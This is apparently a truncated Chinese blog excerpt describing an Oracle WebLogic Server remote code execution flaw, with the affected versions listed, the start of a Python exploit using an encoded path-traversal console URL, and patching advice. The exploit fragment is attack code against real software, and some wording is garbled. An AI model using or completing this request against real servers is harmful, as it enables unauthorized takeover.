Oracle WebLogic Server(WLS)是一种广泛应用于企业级应用程序的Java应用程序服务器。然而,WLS的核心组件存在一个远程代码执行漏洞,攻击者可以利用此漏洞来远程代理数据库。
该漏洞的影响版本包括Oracle WebLogic Server 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0和12.2.1.4.0。攻击者可以通过发送特制的请求利用此漏洞,从而在未经授权的情况下执行任意代码。
以下是一个示例漏洞利用的Python代码:
import requests
target_url = "http://target-website.com:7001/console/css/%252e%252e%252fconsole.portal"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Oracle WebLogic Server 存在远程代码执行漏洞,影响多个版本。攻击者可借此执行任意代码,控制数据库。建议更新安全补丁,限制管理控制台访问,网络隔离及加强安全审计和监控,以保障系统安全。
订阅专栏 解锁全文
1670

被折叠的 条评论
为什么被折叠?



